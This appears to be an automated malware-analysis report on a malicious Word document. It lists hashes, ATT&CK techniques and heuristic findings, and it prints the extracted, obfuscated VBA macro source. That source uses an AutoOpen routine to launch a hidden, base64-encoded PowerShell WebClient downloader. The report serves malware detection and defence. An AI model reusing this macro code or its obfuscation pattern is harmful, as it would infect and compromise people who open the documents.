Office (OLE) malware analysis — malicious · 2e6829dcde385ed3

MALICIOUS

Office (OLE)

104.0 KB Created: 2018-05-30 19:09:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: b3e43c376109b06dc3616004ad9e544d SHA-1: 55b356a9a95a2b92e1cdb4761260679a545bd7c8 SHA-256: 2e6829dcde385ed3d05649780771fb168cb51e38e570ce648b5932a466568d56

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers a Shell() call, which is highly suspicious. The script attempts to construct a PowerShell command, indicating it's designed to download and execute a secondary payload. The ClamAV detection further supports its malicious nature.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6566615-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6566615-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14782 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14782 bytes
SHA-256: `93c0308dc4ce966c20353f0e1943a3b93df371a4ebd40cd367eb468aed4d34b7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "vfBTIzaIncsHIY" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function wzwnF() On Error Resume Next Select Case KAlStHGr Case 68228 XsIjuv = 19394 zHjjA = CDbl(4032) Case 76179 vPOZM = fGLHEj UuPKB = 65359 End Select Select Case KAlObpCqW Case 36131 AAwRf = 85861 qdKdm = CDbl(25051) Case 3865 nrdwi = QZwUL UZMipS = 24556 End Select wzwnF = COHPmzq + Shell(rjvzjrRnUQ + Chr(vbKeyP) + pIcVdL + fZWbm + CYVfwmlU + pwzifiohh + jKzdPrduQH + vJfaFObC + pbzjJzPf, vYVlrHiH + vbHide + NarouUGiHQ) Select Case KAlLImBM Case 17006 mAYvP = 24977 CLMao = CDbl(10148) Case 69614 zzTGrQ = boUAw iEckV = 19165 End Select End Function Sub Autoopen() On Error Resume Next Select Case KAlZaYvYQ Case 45106 WPiHV = 67797 phFRm = CDbl(41854) Case 47847 bPQqXH = pSvGCZ XiatP = 9391 End Select wzwnF Select Case KAlqsbdW Case 29730 fEWIAq = 95708 IaAtmZ = CDbl(22481) Case 23432 jjQJX = tFTLkW MBroKO = 46781 End Select End Sub Attribute VB_Name = "CiaqZztWSzijLz" Function pIcVdL() On Error Resume Next Select Case KAllAIha Case 9636 rFzjor = 65187 iovGG = CDbl(89684) Case 70939 LvAGh = EcHoz ZAHts = 68538 End Select szVRCP = "owersHeLL" + " -WinDow" + "sTyle hidde" + "n -e LgA" + "gACgAIAAkAHA" + "AUwBIAG8ATQBFA" + "FsAMgAxAF0AK" + "wAkAHA" + "AUwBoAG8AT" + "QBlAFsAMwAw" Select Case KAllZzDNC Case 34342 FCTrY = 794 zlZwIY = CDbl(1804) Case 44314 zrUiih = NWEzp smDPI = 98228 End Select OzjPzXuwn = "AF0AKwA" + "nAFgAJwApAC" + "AAKAA" + "gACgAJwBO" + "AEUAVgAnACsAJw" + "BuACcAKwAnAHM" + "AJwArACcAYQAnA" Select Case KAlnwbNn Case 5599 TuaSk = 4257 DVinf = CDbl(45701) Case 431 UTBvm = mutPBz CQGqbL = 67246 End Select hDBMaiiJCO = "CsAJwBkACcAKwAn" + "AGEAc" + "wBkACAAPQAg" + "ACYAKAAn" + "ACsAJwB" + "wADUASQBuAH" Select Case KAlwmOnn Case 79056 VcdbZ = 64778 HMsQcj = CDbl(99614) Case 64653 iEkAF = wELRmY mIwDVZ = 31195 End Select wLfRniTjjCO = "AAJwArACcANQAnA" + "CsAJwBJACs" + "AcAA1AEk" + "AJwArA" + "CcAZQAnACsAJwB" Select Case KAlaXGbJu Case 97521 jCTOj = 60998 DoLtjY = CDbl(29571) Case 15697 DZZjSY = aRQIj Zwjztc = 28729 End Select wiOEZFVK = "wADUASQArAHAANQ" + "BJAHcALQBvAGIA" + "agBlAGMAJwArA" + "CcAcAA1A" Select Case KAlJwGZv Case 29581 fjNLP = 20833 jVOsK = CDbl(83734) Case 86943 SXBYPP = jimtc bSKWJA = 90441 End Select bhwMi = "CcAKwAnAEk" + "AJwArACcA" + "KwBwADUASQB" + "0AHAANQBJACkAIA" + "ByAGEAbgBkAG8" + "AbQA7" + "AE4ARQ" + "BWAFkAJwArACcA" + "WQBVACAAPQ" + "AgACcAKwAnAC4A" Select Case KAlCzQTBM Case 21951 BSXZMf = 68196 WAuSA = CDbl(67206) Case 46972 iiICE = BqwPQ kFNCBA = 56172 End Select WALPiApJG = "KABwADU" + "AJwArACcAS" + "QBuAGUAc" + "AA1AEkAKwB" + "wADUAS" + "QB3AHAANQBJ" + "ACcAK" + "wAnACs" + "AcAA1AEkALQAnA" + "CsAJwBvA" Select Case KAlVDjvj Case 73145 IGchT = 47528 lWEIdf = CDbl(32057) Case 62707 zPJnRm = RzFDAf MTSVsk = 42316 End Select GhFjboKpwY = "CcAKwAnAGIAJwA" + "rACcAagBlAG" + "MAJwArAC" + "cAdABwA" Select Case KAlwBqUqw Case 85935 zEpbj = 62874 wiWOK = CDbl(66744) Case 26986 tGYsp = KYwFP Hwzvt = 47728 End Select MLzXXC = "DUASQApACAAU" + "wAnACsAJwB5" + "AHMAdABlACcAKw" + "AnAG0ALgB" + "OAGUAdAAuAFc" + "AJwArA ... (truncated)

SHA-256: 93c0308dc4ce966c20353f0e1943a3b93df371a4ebd40cd367eb468aed4d34b7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "vfBTIzaIncsHIY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function wzwnF()
On Error Resume Next
Select Case KAlStHGr
      Case 68228
         XsIjuv = 19394
         zHjjA = CDbl(4032)
      Case 76179
         vPOZM = fGLHEj
         UuPKB = 65359
End Select
Select Case KAlObpCqW
      Case 36131
         AAwRf = 85861
         qdKdm = CDbl(25051)
      Case 3865
         nrdwi = QZwUL
         UZMipS = 24556
End Select
wzwnF = COHPmzq + Shell(rjvzjrRnUQ + Chr(vbKeyP) + pIcVdL + fZWbm + CYVfwmlU + pwzifiohh + jKzdPrduQH + vJfaFObC + pbzjJzPf, vYVlrHiH + vbHide + NarouUGiHQ)
Select Case KAlLImBM
      Case 17006
         mAYvP = 24977
         CLMao = CDbl(10148)
      Case 69614
         zzTGrQ = boUAw
         iEckV = 19165
End Select
End Function
Sub Autoopen()
On Error Resume Next
Select Case KAlZaYvYQ
      Case 45106
         WPiHV = 67797
         phFRm = CDbl(41854)
      Case 47847
         bPQqXH = pSvGCZ
         XiatP = 9391
End Select
wzwnF
Select Case KAlqsbdW
      Case 29730
         fEWIAq = 95708
         IaAtmZ = CDbl(22481)
      Case 23432
         jjQJX = tFTLkW
         MBroKO = 46781
End Select
End Sub


Attribute VB_Name = "CiaqZztWSzijLz"
Function pIcVdL()
On Error Resume Next
Select Case KAllAIha
      Case 9636
         rFzjor = 65187
         iovGG = CDbl(89684)
      Case 70939
         LvAGh = EcHoz
         ZAHts = 68538
End Select
szVRCP = "owersHeLL" + " -WinDow" + "sTyle hidde" + "n -e LgA" + "gACgAIAAkAHA" + "AUwBIAG8ATQBFA" + "FsAMgAxAF0AK" + "wAkAHA" + "AUwBoAG8AT" + "QBlAFsAMwAw"
Select Case KAllZzDNC
      Case 34342
         FCTrY = 794
         zlZwIY = CDbl(1804)
      Case 44314
         zrUiih = NWEzp
         smDPI = 98228
End Select
OzjPzXuwn = "AF0AKwA" + "nAFgAJwApAC" + "AAKAA" + "gACgAJwBO" + "AEUAVgAnACsAJw" + "BuACcAKwAnAHM" + "AJwArACcAYQAnA"
Select Case KAlnwbNn
      Case 5599
         TuaSk = 4257
         DVinf = CDbl(45701)
      Case 431
         UTBvm = mutPBz
         CQGqbL = 67246
End Select
hDBMaiiJCO = "CsAJwBkACcAKwAn" + "AGEAc" + "wBkACAAPQAg" + "ACYAKAAn" + "ACsAJwB" + "wADUASQBuAH"
Select Case KAlwmOnn
      Case 79056
         VcdbZ = 64778
         HMsQcj = CDbl(99614)
      Case 64653
         iEkAF = wELRmY
         mIwDVZ = 31195
End Select
wLfRniTjjCO = "AAJwArACcANQAnA" + "CsAJwBJACs" + "AcAA1AEk" + "AJwArA" + "CcAZQAnACsAJwB"
Select Case KAlaXGbJu
      Case 97521
         jCTOj = 60998
         DoLtjY = CDbl(29571)
      Case 15697
         DZZjSY = aRQIj
         Zwjztc = 28729
End Select
wiOEZFVK = "wADUASQArAHAANQ" + "BJAHcALQBvAGIA" + "agBlAGMAJwArA" + "CcAcAA1A"
Select Case KAlJwGZv
      Case 29581
         fjNLP = 20833
         jVOsK = CDbl(83734)
      Case 86943
         SXBYPP = jimtc
         bSKWJA = 90441
End Select
bhwMi = "CcAKwAnAEk" + "AJwArACcA" + "KwBwADUASQB" + "0AHAANQBJACkAIA" + "ByAGEAbgBkAG8" + "AbQA7" + "AE4ARQ" + "BWAFkAJwArACcA" + "WQBVACAAPQ" + "AgACcAKwAnAC4A"
Select Case KAlCzQTBM
      Case 21951
         BSXZMf = 68196
         WAuSA = CDbl(67206)
      Case 46972
         iiICE = BqwPQ
         kFNCBA = 56172
End Select
WALPiApJG = "KABwADU" + "AJwArACcAS" + "QBuAGUAc" + "AA1AEkAKwB" + "wADUAS" + "QB3AHAANQBJ" + "ACcAK" + "wAnACs" + "AcAA1AEkALQAnA" + "CsAJwBvA"
Select Case KAlVDjvj
      Case 73145
         IGchT = 47528
         lWEIdf = CDbl(32057)
      Case 62707
         zPJnRm = RzFDAf
         MTSVsk = 42316
End Select
GhFjboKpwY = "CcAKwAnAGIAJwA" + "rACcAagBlAG" + "MAJwArAC" + "cAdABwA"
Select Case KAlwBqUqw
      Case 85935
         zEpbj = 62874
         wiWOK = CDbl(66744)
      Case 26986
         tGYsp = KYwFP
         Hwzvt = 47728
End Select
MLzXXC = "DUASQApACAAU" + "wAnACsAJwB5" + "AHMAdABlACcAKw" + "AnAG0ALgB" + "OAGUAdAAuAFc" + "AJwArA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.